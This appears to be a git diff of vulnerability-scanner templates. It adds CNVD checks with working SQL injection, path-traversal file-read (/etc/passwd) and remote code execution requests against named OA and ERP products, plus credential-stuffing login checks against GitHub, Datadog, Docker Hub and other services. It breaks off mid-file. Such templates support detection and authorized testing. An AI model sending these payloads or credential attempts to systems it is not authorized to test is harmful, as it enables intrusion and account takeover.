490a0046304402206bce9ad07810b0c2ef9e3788ab1095e2b2c9d9c8806818fc3b036853c69ff60a02202b9b856f782fa62eb1b220a3e9ca62f57a4e710eec345007786a5bf628896034:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-26422.yaml b/http/cnvd/2021/CNVD-2021-26422.yaml index 70d1b0e157..33197c44fe 100644 --- a/http/cnvd/2021/CNVD-2021-26422.yaml +++ b/http/cnvd/2021/CNVD-2021-26422.yaml @@ -10,11 +10,11 @@ info: - https://github.com/EdgeSecurityTeam/Vulnerability/blob/main/%E4%BA%BF%E9%82%AE%E9%82%AE%E4%BB%B6%E7%B3%BB%E7%BB%9F%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E%20(CNVD-2021-26422).md classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: eyoumail,rce,cnvd,cnvd2021 metadata: max-request: 1 + tags: eyoumail,rce,cnvd,cnvd2021 http: - raw: @@ -35,4 +35,4 @@ http: status: - 200 -# Enhanced by mp on 2022/05/12 +# digest: 490a0046304402201ee36adf50f32ae67f64599b94d2b9dfa6a4a0094adc93f90ecab288cecc93290220254600764abc5267785430750c6f77bf40fe664896993a2fbcc0d779fc106ae8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-28277.yaml b/http/cnvd/2021/CNVD-2021-28277.yaml index 9646f6cf4f..cbb2bb479f 100644 --- a/http/cnvd/2021/CNVD-2021-28277.yaml +++ b/http/cnvd/2021/CNVD-2021-28277.yaml @@ -8,13 +8,13 @@ info: reference: - https://www.aisoutu.com/a/1432457 - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw - metadata: - max-request: 2 - fofa-query: app="Landray OA system" classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N cvss-score: 8.6 cwe-id: CWE-22 + metadata: + max-request: 2 + fofa-query: app="Landray OA system" tags: landray,lfi,cnvd,cnvd2021 http: @@ -26,7 +26,6 @@ http: Content-Type: application/x-www-form-urlencoded var={"body":{"file":"file:///etc/passwd"}} - - | POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Host: {{Hostname}} @@ -36,9 +35,9 @@ http: var={"body":{"file":"file:///c://windows/win.ini"}} stop-at-first-match: true + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -49,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/07/06 +# digest: 4a0a00473045022055ed57d6d24038e0c53a5a301192831ea1e2e562ada51eb178e08549e021db68022100d4c9e7513264a6ece808bd569d4d15d300d55b554bbf98f7016c1ab36c5e19e3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-30167.yaml b/http/cnvd/2021/CNVD-2021-30167.yaml index 14828ebedc..374565249b 100644 --- a/http/cnvd/2021/CNVD-2021-30167.yaml +++ b/http/cnvd/2021/CNVD-2021-30167.yaml @@ -11,11 +11,11 @@ info: - https://chowdera.com/2022/03/202203110138271510.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2021,beanshell,rce,yonyou metadata: max-request: 2 + tags: cnvd,cnvd2021,beanshell,rce,yonyou http: - raw: @@ -25,7 +25,6 @@ http: Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); - - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} @@ -49,4 +48,4 @@ http: status: - 200 -# Enhanced by cs on 2022/07/05 +# digest: 490a00463044022075851a06d033f726653dc465d8edecb38faafda19c132555fc9696ecb02992d7022020a632b9d53f6a468b8d01d87e238496e6284c3b5331e5ea7f0a868c534cac22:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-32799.yaml b/http/cnvd/2021/CNVD-2021-32799.yaml new file mode 100644 index 0000000000..796167b833 --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-32799.yaml @@ -0,0 +1,42 @@ +id: CNVD-2021-32799 + +info: + name: 360 Xintianqing - SQL Injection + author: SleepingBag945 + severity: high + reference: + - https://blog.51cto.com/u_9691128/4295047 + - https://www.cnvd.org.cn/patchInfo/show/270651 + - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/CNVD/2021/CNVD-2021-32799.yaml + metadata: + verified: true + max-request: 1 + fofa-query: app="360新天擎" + tags: cnvd,cnvd2021,360,xintianqing,sqli + +http: + - method: GET + path: + - '{{BaseURL}}/api/dp/rptsvcsyncpoint?ccid=1' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '"reason":' + - '"success"' + - '"antiadwa":' + - '"clientupgrade":' + condition: and + + - type: word + part: header + words: + - 'application/json' + + - type: status + status: + - 200 + +# digest: 4a0a00473045022006cca5f941e35ce5c204962052c2d4eb74627fc58d6de9b9976b967b1643ea8f022100e2b50bf34a6ee4636802796f5b1e866212a29264161bbc98a5553a60186651d1:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-33202.yaml b/http/cnvd/2021/CNVD-2021-33202.yaml new file mode 100755 index 0000000000..c46db387d1 --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-33202.yaml @@ -0,0 +1,37 @@ +id: CNVD-2021-33202 + +info: + name: OA E-Cology LoginSSO.jsp - SQL Injection + author: SleepingBag945 + severity: high + description: | + e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information. + reference: + - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md + - https://www.cnblogs.com/0day-li/p/14637680.html + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-协同办公OA" + tags: cnvd,cnvd2021,e-cology,sqli +variables: + num: "999999999" + +http: + - raw: + - | + GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body + words: + - '{{md5(num)}}' + + - type: status + status: + - 200 + +# digest: 4b0a00483046022100ad48adb20c4c9f6d9e6bf9f8c0c640310a50506546e93e68cdfbd505b31d7a87022100ad2a768b19fc657d09d9ef105527dcbbedc2ec6012f0defd7e73ed4aa859f7d5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-41972.yaml b/http/cnvd/2021/CNVD-2021-41972.yaml new file mode 100644 index 0000000000..3d1dbae265 --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-41972.yaml @@ -0,0 +1,44 @@ +id: CNVD-2021-41972 + +info: + name: AceNet AceReporter Report - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + All firewall devices that use the AceNet AceReporter report component can download arbitrary files + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972 + - https://github.com/hktalent/scan4all/blob/main/lib/goby/goby_pocs/AceNet_AceReporter_Report_component_Arbitrary_file_download.txt + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-1595726841 + fofa-query: body="Login @ Reporter" + tags: cnvd,cnvd2021,acenet,acereporter,lfi +variables: + filename: "{{to_lower(rand_text_alpha(5))}}" + +http: + - method: GET + path: + - "{{BaseURL}}/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename={{filename}}.txt" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - 'filename=' + - 'application/octet-stream' + condition: and + + - type: status + status: + - 200 + +# digest: 490a0046304402201a76dd1d015d8886e92b8e34070a8919aa446d7505b40854c2000412bc56da1d022009e75285fa9000f24fd8c4ee96e5a5f001c79d80816e4f71383a1b3cbb638961:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-43984.yaml b/http/cnvd/2021/CNVD-2021-43984.yaml new file mode 100644 index 0000000000..0c25f5b57f --- /dev/null +++ b/http/cnvd/2021/CNVD-2021-43984.yaml @@ -0,0 +1,41 @@ +id: CNVD-2021-43984 + +info: + name: MPSec ISG1000 Security Gateway - Arbitrary File Download + author: DhiyaneshDk + severity: high + description: | + The MPSec ISG1000 safety gateway at MP Communications Technology Co., Ltd. has any file download loophole, and attackers can use the loophole to obtain sensitive information. + reference: + - https://www.cnvd.org.cn/flaw/show/CNVD-2021-43984 + - https://github.com/chaitin/xray/blob/master/pocs/mpsec-isg1000-file-read.yml + metadata: + verified: true + max-request: 1 + fofa-query: "迈普通信技术股份有限公司" + tags: cnvd,cnvd2021,mpsec,maipu,lfi,isg + +http: + - method: GET + path: + - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: word + part: header + words: + - "text/plain" + - "USGSESSID=" + condition: and + + - type: status + status: + - 200 + +# digest: 4a0a00473045022061598004928357fcf001b2b6d6b923410f88220ddc33e1d397637ac2f854d5fb022100d28b7934c715f0e8bc357071dfad8b755a936e9771c6d808d7fef19d6e47cdcd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2021/CNVD-2021-49104.yaml b/http/cnvd/2021/CNVD-2021-49104.yaml index 692a4936ad..e34fe54666 100644 --- a/http/cnvd/2021/CNVD-2021-49104.yaml +++ b/http/cnvd/2021/CNVD-2021-49104.yaml @@ -5,6 +5,7 @@ info: author: pikpikcu severity: critical description: The Pan Wei Micro E-office version running allows arbitrary file uploads from a remote attacker. + remediation: Pan Wei has released an update to resolve this vulnerability. reference: - https://chowdera.com/2021/12/202112200602130067.html - http://v10.e-office.cn @@ -12,10 +13,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L cvss-score: 9.9 cwe-id: CWE-434 - remediation: Pan Wei has released an update to resolve this vulnerability. - tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive metadata: max-request: 2 + tags: pan,micro,cnvd,cnvd2021,fileupload,intrusive http: - raw: @@ -31,7 +31,6 @@ http: --e64bdf16c554bbc109cecef6451c26a4-- - - | GET /images/logo/logo-eoffice.php HTTP/1.1 Host: {{Hostname}} @@ -47,4 +46,4 @@ http: status: - 200 -# Enhanced by cs on 2022/02/28 +# digest: 4b0a00483046022100bd9b5f3618af1b84267da052f6b21275ab544c27634ae5beb3d26595c2444ac2022100b5ea329f8f3d96e00d479c3f77ab3c026baae49cb919a9dd884da642c5fe2c39:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2022/CNVD-2022-03672.yaml b/http/cnvd/2022/CNVD-2022-03672.yaml index d9f50263d2..93395e0d7d 100644 --- a/http/cnvd/2022/CNVD-2022-03672.yaml +++ b/http/cnvd/2022/CNVD-2022-03672.yaml @@ -12,11 +12,11 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-77 - tags: cnvd,cnvd2020,sunflower,rce metadata: max-request: 2 + tags: cnvd,cnvd2020,sunflower,rce http: - raw: @@ -37,7 +37,6 @@ http: group: 1 regex: - '"verify_string":"(.*?)"' - req-condition: true matchers: - type: dsl @@ -48,4 +47,4 @@ http: - "contains(body_2, 'Windows IP')" condition: and -# Enhanced by mp on 2022/05/12 +# digest: 4a0a004730450221008c407aa51b36f64812ea3b106ac95b6fb50a0fff06a589a7d275ca99b66e618a02204864e1ecf01c2b486bd77a69c80e34c899346d68811ffd87b880afd043a1079d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2022/CNVD-2022-42853.yaml b/http/cnvd/2022/CNVD-2022-42853.yaml index ae734b9282..af22b42117 100644 --- a/http/cnvd/2022/CNVD-2022-42853.yaml +++ b/http/cnvd/2022/CNVD-2022-42853.yaml @@ -11,15 +11,14 @@ info: - https://www.cnvd.org.cn/flaw/show/CNVD-2022-42853 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 + cvss-score: 10 cwe-id: CWE-89 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"zentao" fofa-query: "Zentao" tags: cnvd,cnvd2022,zentao,sqli - variables: num: "999999999" @@ -39,4 +38,4 @@ http: words: - 'c8c605999f3d8352d7bb792cf3fdb25' -# Enhanced by mp on 2022/09/28 +# digest: 4a0a00473045022009572d4885de4de6ef2312a58a67d6c67fefd27b962fa80a8e3864193987c66f022100e190d2836fe344522dc84ded60b1213a62631baac598ca6dd444edfff9ec535c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2022/CNVD-2022-43245.yaml b/http/cnvd/2022/CNVD-2022-43245.yaml new file mode 100755 index 0000000000..6d3542ad2c --- /dev/null +++ b/http/cnvd/2022/CNVD-2022-43245.yaml @@ -0,0 +1,43 @@ +id: CNVD-2022-43245 + +info: + name: Weaver OA XmlRpcServlet - Arbitary File Read + author: SleepingBag945 + severity: high + description: | + e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information. + metadata: + verified: true + max-request: 1 + fofa-query: app="泛微-协同办公OA" + tags: cnvd,cnvd2022,weaver,e-office,oa,lfi + +http: + - raw: + - | + POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/xml + + + WorkflowService.getAttachment + /etc/passwd + + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "" + + - type: word + part: header + words: + - "text/xml" + + - type: status + status: + - 200 + +# digest: 490a004630440220409f4c0eb8fc6b1d328944400c499675e5df4db2478f76a4855474ade6b0f01c02201cf7cb9d1eac68921863599f86b3360bf2d1c81bfc642de585a9bb41a2b006ff:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2022/CNVD-2022-86535.yaml b/http/cnvd/2022/CNVD-2022-86535.yaml new file mode 100644 index 0000000000..76d26a34dd --- /dev/null +++ b/http/cnvd/2022/CNVD-2022-86535.yaml @@ -0,0 +1,45 @@ +id: CNVD-2022-86535 + +info: + name: ThinkPHP Multi Languag - File Inc & Remote Code Execution (RCE) + author: arliya,ritikchaddha + severity: high + description: | + ThinkPHP has a command execution vulnerability because the multi-language function is enabled and the parameter passing of parameter lang is not strictly filtered. Attackers can use this vulnerability to execute commands. + reference: + - https://cn-sec.com/archives/1465289.html + - https://blog.csdn.net/qq_60614981/article/details/128724640 + - https://www.cnvd.org.cn/flaw/show/CNVD-2022-86535 + metadata: + verified: true + max-request: 3 + tags: cnvd,cnvd2022,thinkphp,rce + +http: + - raw: + - | + GET /?lang=../../../../../usr/local/php/pearcmd HTTP/1.1 + Host: {{Hostname}} + - | + GET / HTTP/1.1 + Host: {{Hostname}} + think-lang: ../../../../../usr/local/php/pearcmd + - | + GET /?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+{{rand_base(10)}}.log HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: or + matchers: + - type: word + part: set_cookie + words: + - "think_lang=..%2F..%2F..%2F..%2F" + + - type: word + part: body_3 + words: + - "CONFIGURATION" + - "Successfully created" + condition: and + +# digest: 4a0a00473045022061630427dd72328900e8eb0f4d67c91f2c826690524c1c973c1cfe5b64400926022100c6c345fd5fbcc3038eaec942397faf5b9658b328bbb421f95eb3d2146d7f0cd7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2023/CNVD-2023-08743.yaml b/http/cnvd/2023/CNVD-2023-08743.yaml new file mode 100644 index 0000000000..7213e46a4a --- /dev/null +++ b/http/cnvd/2023/CNVD-2023-08743.yaml @@ -0,0 +1,31 @@ +id: CNVD-2023-08743 + +info: + name: Hongjing Human Resource Management System - SQL Injection + author: SleepingBag945 + severity: critical + description: There is a SQL injection vulnerability in the categories of Hongjing Human Resource Management System, from which attackers can obtain sensitive database information. + reference: + - https://www.henry4e36.top/index.php/archives/162.html + - https://blog.csdn.net/qq_41904294/article/details/130944159 + metadata: + verified: true + max-request: 1 + fofa-query: title="人力资源信息管理系统" + tags: cnvd,cnvd2023,hongjing,hcm + +http: + - raw: + - | + GET /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27hongjing~27~2c~40~40version~2d~2d HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(header,"text/xml")' + - 'contains_all(body,"TreeNode id=\"hongjing","SQL Server")' + condition: and + +# digest: 4b0a00483046022100bf751b2abd8d57fb41700237420e6614f9e1cd5cfecaa91d42a7a4bd627f528a022100aa57203f2f66de60ca8a864c13f210e134a55990c97f44c1cabeb436ecb7c4a2:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2023/CNVD-2023-12632.yaml b/http/cnvd/2023/CNVD-2023-12632.yaml index d853063508..234b570ce8 100644 --- a/http/cnvd/2023/CNVD-2023-12632.yaml +++ b/http/cnvd/2023/CNVD-2023-12632.yaml @@ -10,15 +10,14 @@ info: - https://www.zhihu.com/tardis/zm/art/625931869?source_id=1003 - https://blog.csdn.net/qq_50854662/article/details/129992329 metadata: - max-request: 1 verified: true - fofa-query: app="泛微-协同商务系统" + max-request: 1 shodan-query: 'ecology_JSessionid' + fofa-query: app="泛微-协同商务系统" tags: cnvd,cnvd2023,ecology,sqli # a' union select 1,''+(SELECT md5(9999999))+' # URL encoded 3 times - http: - raw: - | @@ -41,3 +40,5 @@ http: - type: status status: - 200 + +# digest: 4a0a00473045022100ac8d7d77e7fc71d72ed50693564d11a326afd1e25d223a0089bea19f7f2776370220530d4c64341f3cb397f5a7765569d5d626dbf4a0b8d114ef8c9ad1af078f1061:922c64590222798bb761d5b6d8e72950 diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml new file mode 100644 index 0000000000..2646493d12 --- /dev/null +++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml @@ -0,0 +1,33 @@ +id: CNVD-C-2023-76801 + +info: + name: UFIDA NC uapjs - RCE vulnerability + author: SleepingBag945 + severity: critical + description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks. + metadata: + max-request: 2 + tags: cnvd,cnvd2023,yonyou,rce,intrusive + +http: + - raw: + - | + POST /uapjs/jsinvoke/?action=invoke HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded;charset=UTF-8 + + {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", + "parameterTypes":["java.lang.Object","java.lang.String"], + "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]} + - | + GET /{{randstr_1}}.jsp HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - status_code_1 == 200 + - status_code_2 == 200 && contains(body_2,"{{randstr_2}}") + condition: and + +# digest: 4b0a00483046022100998225dae1eaa205075155ab10edbd8b2dbae58d976e5d4415f662ccd76ec102022100dafe4c8d3a42c6210d8e7847658fa39c5828b806052a30c28d09e00669e864bb:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml index 6a6e3c6f7d..cb5d001434 100644 --- a/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml +++ b/http/credential-stuffing/cloud/atechmedia-codebase-login-check.yaml @@ -1,5 +1,5 @@ -id: atechmedia-codebase-login-check - +id: atechmedia-codebase-login-check + info: name: Atechmedia/Codebase Login Check author: parthmalhotra,pdresearch @@ -10,46 +10,49 @@ info: metadata: max-request: 2 tags: login-check,atechmedia,codebase,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://identity.atechmedia.com/login HTTP/1.1 - Host: identity.atechmedia.com - Referer: https://identity.atechmedia.com/login - - - | - POST https://identity.atechmedia.com/login HTTP/1.1 - Host: identity.atechmedia.com - Origin: https://identity.atechmedia.com - Content-Type: application/x-www-form-urlencoded - Referer: https://identity.atechmedia.com/login - - utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login - - - cookie-reuse: true - extractors: - - type: xpath - name: authenticity_token - part: body - attribute: value - internal: true - xpath: - - /html/body/div/div[2]/div/form/input[2] - - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Set-Cookie: user_session' - - - type: status - status: - - 302 + +self-contained: true + +http: + - raw: + - | + GET https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + Referer: https://identity.atechmedia.com/login + - | + POST https://identity.atechmedia.com/login HTTP/1.1 + Host: identity.atechmedia.com + Origin: https://identity.atechmedia.com + Content-Type: application/x-www-form-urlencoded + Referer: https://identity.atechmedia.com/login + + utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login + + cookie-reuse: true + + extractors: + - type: xpath + name: authenticity_token + part: body + attribute: value + internal: true + xpath: + - /html/body/div/div[2]/div/form/input[2] + + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Set-Cookie: user_session' + + - type: status + status: + - 302 + +# digest: 4a0a00473045022100c384ce54425ceca912163457c51d59fd11e55cd372ccf0626bf0a692e53bf8430220545d1537be95d92f44950c18a3bdfe030f9346e657f2436e32a0b5bc8f77db06:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/atlassian-login-check.yaml b/http/credential-stuffing/cloud/atlassian-login-check.yaml index d2b3b5cd58..d29e8ffc78 100644 --- a/http/credential-stuffing/cloud/atlassian-login-check.yaml +++ b/http/credential-stuffing/cloud/atlassian-login-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,atlassian,creds-stuffing self-contained: true + http: - raw: - | @@ -28,8 +29,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -40,3 +41,5 @@ http: - type: status status: - 403 + +# digest: 490a0046304402206f50cd5e1d38f5e8d581cf0327ea54c3e6d99e90b496555be87136c6358ea65702201b6d5dd42c50dd91d9ae55ed828d0029fed2053fc6a2d30fe99cc8a32eb591e5:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml index 4ed8b20196..5b7bd4c129 100644 --- a/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml +++ b/http/credential-stuffing/cloud/avnil-pdf-generator-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,avnil-pdf,creds-stuffing self-contained: true + http: - raw: - | @@ -38,4 +39,6 @@ http: - type: status status: - - 200 \ No newline at end of file + - 200 + +# digest: 490a0046304402204b1e7e40c67c2247f9f558ddd4a992beee8ece82c1882a5e6c32181905e83489022048f5c5719753b894301591560cf8ce2b2b0d50dcb4fbfffa80a39bb0a96e7ab6:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/chefio-login-check.yaml b/http/credential-stuffing/cloud/chefio-login-check.yaml index 8e80b3607e..a931eaf337 100644 --- a/http/credential-stuffing/cloud/chefio-login-check.yaml +++ b/http/credential-stuffing/cloud/chefio-login-check.yaml @@ -1,4 +1,5 @@ id: chefio-login-check + info: name: Chef.io Login Check author: parthmalhotra,pdresearch @@ -11,6 +12,7 @@ info: tags: login-check,chefio,creds-stuffing self-contained: true + http: - raw: - | @@ -29,4 +31,6 @@ http: - type: status status: - - 302 \ No newline at end of file + - 302 + +# digest: 490a0046304402200c3238e6e98a6fa779a4b4e2d33d86c0a2c80eefff6815249e7c0cdf0a95501b02206d958bc31a683e23a949eb4309323902a0cfa3145f45504afc40dc264aa9d328:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/codepen-login-check.yaml b/http/credential-stuffing/cloud/codepen-login-check.yaml index 0e59611a93..23ee8582c6 100644 --- a/http/credential-stuffing/cloud/codepen-login-check.yaml +++ b/http/credential-stuffing/cloud/codepen-login-check.yaml @@ -1,4 +1,5 @@ id: codepen-login-check + info: name: codepen.io Login Check author: parthmalhotra,pdresearch @@ -11,12 +12,12 @@ info: tags: login-check,codepen,creds-stuffing self-contained: true + http: - raw: - | GET https://codepen.io/login HTTP/1.1 Host: codepen.io - - | POST https://codepen.io/login/login HTTP/1.1 Host: codepen.io @@ -30,12 +31,14 @@ http: dsl: - username - password + - type: xpath part: body xpath: - '//input[@name="authenticity_token"]/@value' name: token internal: true + matchers-condition: and matchers: - type: word @@ -43,6 +46,9 @@ http: negative: true words: - 'The username or password you entered is incorrect, please try again.' + - type: status status: - - 302 \ No newline at end of file + - 302 + +# digest: 4b0a00483046022100ee28d1ae20bce2854ff678d0e98a2adbd2d5db67d6576b1ca21493e0ea84fe5a0221008dde9af9ce3eb460af932c2d20eade6c844a180c6847e633232b1c0de5202919:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/datadog-login-check.yaml b/http/credential-stuffing/cloud/datadog-login-check.yaml index 37d5ee2adb..7005384224 100644 --- a/http/credential-stuffing/cloud/datadog-login-check.yaml +++ b/http/credential-stuffing/cloud/datadog-login-check.yaml @@ -12,12 +12,12 @@ info: tags: login-check,datadog,creds-stuffing self-contained: true + http: - raw: - | GET https://app.datadoghq.com/account/login HTTP/1.1 Host: app.datadoghq.com - - | POST https://app.datadoghq.com/account/login? HTTP/1.1 Host: app.datadoghq.com @@ -25,8 +25,8 @@ http: _authentication_token={{auth_token}}&username={{username}}&password={{password}} - cookie-reuse: true + extractors: - type: regex name: auth_token @@ -40,8 +40,8 @@ http: dsl: - username - password - attack: pitchfork + matchers-condition: and matchers: - type: word @@ -51,4 +51,6 @@ http: - type: status status: - - 302 \ No newline at end of file + - 302 + +# digest: 490a0046304402202602b4cf818cffc0e63f51a11b23f05a83a0250bd59f5885fc159ed3257ec957022006e10b82bbf568df89d81c83eeba2235a2e6b7fee466ac47cec4f4075db2c1e7:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/docker-hub-login-check.yaml b/http/credential-stuffing/cloud/docker-hub-login-check.yaml index 8a30f80d72..4a3022de76 100644 --- a/http/credential-stuffing/cloud/docker-hub-login-check.yaml +++ b/http/credential-stuffing/cloud/docker-hub-login-check.yaml @@ -12,6 +12,7 @@ info: tags: login-check,docker,creds-stuffing self-contained: true + http: - raw: - | @@ -26,6 +27,7 @@ http: threads: 30 attack: pitchfork + matchers-condition: and matchers: - type: word @@ -46,4 +48,6 @@ http: - type: dsl dsl: - username - - password \ No newline at end of file + - password + +# digest: 4a0a004730450221008c4d60a0da3037866ea362dfa1ba0e4b78191781709ccab049d893ef2306538402203b553845722c5556ceb66c757f29933ca5cc83d04d2e0c763d3caf32551c607d:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/gitea-login-check.yaml b/http/credential-stuffing/cloud/gitea-login-check.yaml index f9a606176d..f35246fd37 100644 --- a/http/credential-stuffing/cloud/gitea-login-check.yaml +++ b/http/credential-stuffing/cloud/gitea-login-check.yaml @@ -1,5 +1,5 @@ -id: gitea-login-check - +id: gitea-login-check + info: name: gitea.com Login Check author: parthmalhotra,pdresearch @@ -10,29 +10,33 @@ info: metadata: max-request: 1 tags: login-check,gitea,creds-stuffing -self-contained: true -http: - - raw: - - | - POST https://gitea.com/user/login HTTP/1.1 - Host: gitea.com - Content-Type: application/x-www-form-urlencoded - - user_name={{username}}&password={{password}} - - extractors: - - type: dsl - dsl: - - username - - password - - matchers-condition: and - matchers: - - type: word - part: header - words: - - 'Location: /' - - - type: status - status: - - 303 \ No newline at end of file + +self-contained: true + +http: + - raw: + - | + POST https://gitea.com/user/login HTTP/1.1 + Host: gitea.com + Content-Type: application/x-www-form-urlencoded + + user_name={{username}}&password={{password}} + + extractors: + - type: dsl + dsl: + - username + - password + + matchers-condition: and + matchers: + - type: word + part: header + words: + - 'Location: /' + + - type: status + status: + - 303 + +# digest: 490a004630440220336db9f3532b661201309d80e9dc7f5d7c2bb4c5e3f743162ba826840da0ec520220385db7864b7de0e1a19da5799c1d5f2b6d97cec8176ed507b0cba9b4405bf157:922c64590222798bb761d5b6d8e72950 diff --git a/http/credential-stuffing/cloud/github-login-check.yaml b/http/credential-stuffing/cloud/github-login-check.yaml index f7b461b874..89a29d6975 100644 --- a/http/credential-stuffing/cloud/github-login-check.yaml +++ b/http/credential-stuffing/cloud/github-login-check.yaml @@ -1,5 +1,5 @@ -id: github-login-check - +id: github-login-check + info: name: Github Login Check author: parthmalhotra,pdresearch @@ -10,66 +10,69 @@ info: metadata: max-request: 2 tags: login-check,github,creds-stuffing -self-contained: true -http: - - raw: - - | - GET https://github.com/login HTTP/1.1 - Host: github.com - - - | - POST https://github.com/session HTTP/1.1 - Host: github.com - 